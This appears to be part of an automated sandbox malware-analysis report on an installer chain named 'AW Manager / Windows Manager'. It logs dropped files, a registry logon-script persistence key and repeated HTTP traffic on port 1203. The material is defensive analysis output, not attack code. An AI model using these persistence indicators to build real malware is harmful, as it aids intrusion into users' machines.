                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSID0B4.tmpJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIB48C.tmpJump to dropped file
                                  Source: C:\ProgramData\AW Manager\Windows Manager\updates\v113\v113.exeFile created: C:\Windows\Temp\INA4B57.tmpJump to dropped file
                                  Source: C:\ProgramData\AW Manager\Windows Manager\updates\v113\v113.exeFile created: C:\Windows\Temp\shi4BD5.tmpJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI73FD.tmpJump to dropped file
                                  Source: C:\ProgramData\AW Manager\Windows Manager\updates\v113\v113.exeFile created: C:\AppData\Roaming\AdvancedWindowsManager\Windows Installer 5.0.3\install\decoder.dllJump to dropped file
                                  Source: C:\Windows\SysWOW64\msiexec.exeFile created: C:\Windows\Temp\shi4D3B.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-53US7.tmp\a1.exeFile created: C:\Users\user\AppData\Local\Temp\MSIF9EE.tmpJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIA376.tmpJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSICF56.tmpJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIB4CC.tmpJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSICDCA.tmpJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI5E0C.tmpJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI8183.tmpJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI6F03.tmpJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIC98F.tmpJump to dropped file
                                  Source: C:\Windows\Temp\ce2d31339cfff41b4b6db9e32e93218c\Windows Updater.exeFile created: C:\ProgramData\AW Manager\Windows Manager\updates\v114\v114.exe.partJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-53US7.tmp\a0.exeFile created: C:\Users\user\AppData\Local\Temp\is-8LRUI.tmp\a0.tmpJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI5D6E.tmpJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIA493.tmpJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI703E.tmpJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI743D.tmpJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI1FDF.tmpJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSICF36.tmpJump to dropped file
                                  Source: C:\Windows\Temp\ce2d31339cfff41b4b6db9e32e93218c\Windows Updater.exeFile created: C:\ProgramData\AW Manager\Windows Manager\updates\v113\v113.exe.partJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI80A8.tmpJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSICEF6.tmpJump to dropped file
                                  Source: C:\Windows\SysWOW64\msiexec.exeFile created: C:\Users\user\AppData\Local\Temp\shiFB53.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-8LRUI.tmp\a0.tmpFile created: C:\Program Files (x86)\VxCXHgOKWFitaVL Corporation\is-1L53Q.tmpJump to dropped file
                                  Source: C:\Windows\SysWOW64\expand.exeFile created: C:\ProgramData\333e0f034c7f41d48df4d6f9b3a5a54c$dpx$.tmp\d98380e50ba80f4fa3adba0346158290.tmpJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI6E83.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-53US7.tmp\a1.exeFile created: C:\Users\user\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Updater.exeJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI5C23.tmpJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIC813.tmpJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIA463.tmpJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIC92E.tmpJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIA3F5.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-UKDSG.tmp\setup.tmpFile created: C:\Users\user\AppData\Local\Temp\is-53US7.tmp\a1.exeJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI1F60.tmpJump to dropped file
                                  Source: C:\Windows\SysWOW64\msiexec.exeFile created: C:\Windows\Temp\shi5E23.tmpJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSID036.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-8LRUI.tmp\a0.tmpFile created: C:\Program Files (x86)\VxCXHgOKWFitaVL Corporation\is-PML8F.tmpJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI1DA7.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-53US7.tmp\a1.exeFile created: C:\Users\user\AppData\Local\Temp\INAF75B.tmpJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSICF16.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-UKDSG.tmp\setup.tmpFile created: C:\Users\user\AppData\Local\Temp\is-53US7.tmp\_isetup\_setup64.tmpJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIB6B2.tmpJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI738E.tmpJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIB05F.tmpJump to dropped file
                                  Source: C:\Windows\SysWOW64\expand.exeFile created: C:\ProgramData\333e0f034c7f41d48df4d6f9b3a5a54c$dpx$.tmp\e6adbd27df47824481105a18183e1d5e.tmpJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI12C7.tmpJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSICA2C.tmpJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIC745.tmpJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI6AB2.tmpJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIB15B.tmpJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI73CD.tmpJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIB3BF.tmpJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIC5F7.tmpJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI5BF3.tmpJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIC833.tmpJump to dropped file
                                  Source: C:\ProgramData\AW Manager\Windows Manager\updates\v113\v113.exeFile created: C:\AppData\Roaming\AdvancedWindowsManager\Windows Installer 5.0.3\install\7EB1504\Windows Updater.exeJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI5DCD.tmpJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIB1F8.tmpJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exeJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIC5C7.tmpJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI5BA4.tmpJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeFile created: 680af9.rbf (copy)Jump to dropped file
                                  Source: C:\ProgramData\AW Manager\Windows Manager\updates\v113\v113.exeFile created: C:\AppData\Roaming\AdvancedWindowsManager\Windows Installer 5.0.3\install\7EB1504\AdvancedWindowsManager.exeJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIB41E.tmpJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI6BEB.tmpJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI1E83.tmpJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI7F89.tmpJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIB605.tmpJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIB370.tmpJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIA63C.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-UKDSG.tmp\setup.tmpFile created: C:\Users\user\AppData\Local\Temp\is-53US7.tmp\a3.exeJump to dropped file
                                  Source: C:\Windows\SysWOW64\expand.exeFile created: C:\ProgramData\333e0f034c7f41d48df4d6f9b3a5a54c$dpx$.tmp\4120bfd883d24a4daf0a8db223a7081f.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-0270L.tmp\setup.exeFile created: C:\Users\user\AppData\Local\Temp\is-UKDSG.tmp\setup.tmpJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeFile created: 680aff.rbf (copy)Jump to dropped file
                                  Source: C:\Windows\SysWOW64\expand.exeFile created: C:\ProgramData\333e0f034c7f41d48df4d6f9b3a5a54c$dpx$.tmp\f88670462385d642bd8a486306392759.tmpJump to dropped file
                                  Source: C:\Windows\SysWOW64\expand.exeFile created: C:\ProgramData\333e0f034c7f41d48df4d6f9b3a5a54c$dpx$.tmp\2041dcc7124af9419b0b672e9d7171f7.tmpJump to dropped file
                                  Source: C:\Windows\SysWOW64\expand.exeFile created: C:\ProgramData\333e0f034c7f41d48df4d6f9b3a5a54c$dpx$.tmp\5d7fc0667d8a0e48a42ebd70bdd0c76a.tmpJump to dropped file
                                  Source: C:\Windows\SysWOW64\expand.exeFile created: C:\ProgramData\333e0f034c7f41d48df4d6f9b3a5a54c$dpx$.tmp\e6adbd27df47824481105a18183e1d5e.tmpJump to dropped file
                                  Source: C:\Windows\Temp\ce2d31339cfff41b4b6db9e32e93218c\Windows Updater.exeFile created: C:\ProgramData\AW Manager\Windows Manager\updates\v114\v114.exe.partJump to dropped file
                                  Source: C:\Windows\Temp\ce2d31339cfff41b4b6db9e32e93218c\Windows Updater.exeFile created: C:\ProgramData\AW Manager\Windows Manager\updates\v113\v113.exe.partJump to dropped file
                                  Source: C:\Windows\SysWOW64\expand.exeFile created: C:\ProgramData\333e0f034c7f41d48df4d6f9b3a5a54c$dpx$.tmp\d98380e50ba80f4fa3adba0346158290.tmpJump to dropped file
                                  Source: C:\Windows\SysWOW64\expand.exeFile created: C:\ProgramData\333e0f034c7f41d48df4d6f9b3a5a54c$dpx$.tmp\078630d72d217d4d9885ece5b71fe988.tmpJump to dropped file
                                  Source: C:\Windows\SysWOW64\expand.exeFile created: C:\ProgramData\333e0f034c7f41d48df4d6f9b3a5a54c$dpx$.tmp\4120bfd883d24a4daf0a8db223a7081f.tmpJump to dropped file
                                  Source: C:\Windows\SysWOW64\expand.exeFile created: C:\ProgramData\333e0f034c7f41d48df4d6f9b3a5a54c$dpx$.tmp\51ccd7e4634de4468d3b8ec370ae3220.tmpJump to dropped file
                                  Source: C:\Windows\SysWOW64\expand.exeFile created: C:\ProgramData\333e0f034c7f41d48df4d6f9b3a5a54c$dpx$.tmp\cd2f845e419388478df81bc59730a20b.tmpJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIA3C5.tmpJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI1F30.tmpJump to dropped file
                                  Source: C:\Windows\SysWOW64\msiexec.exeFile created: C:\Windows\Temp\shi5EB1.tmpJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSID28A.tmpJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI8687.tmpJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI1239.tmpJump to dropped file
                                  Source: C:\ProgramData\AW Manager\Windows Manager\updates\v113\v113.exeFile created: C:\Windows\Temp\MSI4C62.tmpJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI832A.tmpJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI10B0.tmpJump to dropped file
                                  Source: C:\Windows\SysWOW64\msiexec.exeFile created: C:\Windows\Temp\shi4DAA.tmpJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI11F9.tmpJump to dropped file
                                  Source: C:\Windows\SysWOW64\msiexec.exeFile created: C:\Windows\Temp\shi74BC.tmpJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI5C73.tmpJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI6CC8.tmpJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI6DC5.tmpJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI8057.tmpJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI6F32.tmpJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI234D.tmpJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSICEC6.tmpJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI71C6.tmpJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI1336.tmpJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSICFD6.tmpJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI6E53.tmpJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSICE09.tmpJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI6EA3.tmpJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIBB85.tmpJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI1E63.tmpJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIA5ED.tmpJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIC6E7.tmpJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI1259.tmpJump to dropped file
                                  Source: C:\ProgramData\AW Manager\Windows Manager\updates\v113\v113.exeFile created: C:\Windows\Temp\MSI4CE0.tmpJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSICD1D.tmpJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI7FB9.tmpJump to dropped file
                                  Source: C:\Windows\SysWOW64\msiexec.exeFile created: C:\Windows\Temp\shi743E.tmpJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIC7F2.tmpJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIE2F.tmpJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIC97E.tmpJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIB0CD.tmpJump to dropped file
                                  Source: C:\Program Files (x86)\AW Manager\Windows Manager\Windows Updater.exeFile created: C:\Windows\Temp\ce2d31339cfff41b4b6db9e32e93218c\Windows Updater.exeJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI5C43.tmpJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSICFB6.tmpJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIA521.tmpJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSICFF7.tmpJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI7FF9.tmpJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI6A82.tmpJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSICF77.tmpJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSICC50.tmpJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIC94E.tmpJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI731E.tmpJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI208C.tmpJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI232D.tmpJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIC627.tmpJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI6CE8.tmpJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIC6C6.tmpJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI6ED3.tmpJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI7F4A.tmpJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI6D86.tmpJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI6F72.tmpJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI735E.tmpJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIC676.tmpJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI6929.tmpJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSID0B4.tmpJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIB48C.tmpJump to dropped file
                                  Source: C:\ProgramData\AW Manager\Windows Manager\updates\v113\v113.exeFile created: C:\Windows\Temp\INA4B57.tmpJump to dropped file
                                  Source: C:\ProgramData\AW Manager\Windows Manager\updates\v113\v113.exeFile created: C:\Windows\Temp\shi4BD5.tmpJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI73FD.tmpJump to dropped file
                                  Source: C:\Windows\SysWOW64\msiexec.exeFile created: C:\Windows\Temp\shi4D3B.tmpJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIA376.tmpJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSICF56.tmpJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIB4CC.tmpJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSICDCA.tmpJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI5E0C.tmpJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI8183.tmpJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI6F03.tmpJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIC98F.tmpJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI5D6E.tmpJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIA493.tmpJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI703E.tmpJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI743D.tmpJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI1FDF.tmpJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSICF36.tmpJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI80A8.tmpJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSICEF6.tmpJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI6E83.tmpJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI5C23.tmpJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIC813.tmpJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIA463.tmpJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIC92E.tmpJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIA3F5.tmpJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI1F60.tmpJump to dropped file
                                  Source: C:\Windows\SysWOW64\msiexec.exeFile created: C:\Windows\Temp\shi5E23.tmpJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSID036.tmpJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI1DA7.tmpJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSICF16.tmpJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIB6B2.tmpJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI738E.tmpJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIB05F.tmpJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI12C7.tmpJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIC745.tmpJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSICA2C.tmpJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI6AB2.tmpJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIB15B.tmpJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI73CD.tmpJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIB3BF.tmpJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIC5F7.tmpJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI5BF3.tmpJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIC833.tmpJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI5DCD.tmpJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIB1F8.tmpJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIC5C7.tmpJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI5BA4.tmpJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIB41E.tmpJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI6BEB.tmpJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI1E83.tmpJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI7F89.tmpJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIB605.tmpJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIB370.tmpJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIA63C.tmpJump to dropped file
                                  Source: C:\Windows\Temp\ce2d31339cfff41b4b6db9e32e93218c\Windows Updater.exeFile created: C:\ProgramData\AW Manager\Windows Manager\updates\v114\v114.exe.partJump to dropped file
                                  Source: C:\Windows\Temp\ce2d31339cfff41b4b6db9e32e93218c\Windows Updater.exeFile created: C:\ProgramData\AW Manager\Windows Manager\updates\v113\v113.exe.partJump to dropped file

                                  Boot Survival

                                  barindex
                                  Source: C:\Windows\SysWOW64\reg.exeKey value created or modified: HKEY_CURRENT_USER\Environment UserInitMprLogonScriptJump to behavior
                                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
                                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk
                                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk
                                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk
                                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk
                                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk
                                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk

                                  Hooking and other Techniques for Hiding and Protection

                                  barindex
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 1203 -> 49718
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 1203 -> 49718
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 1203
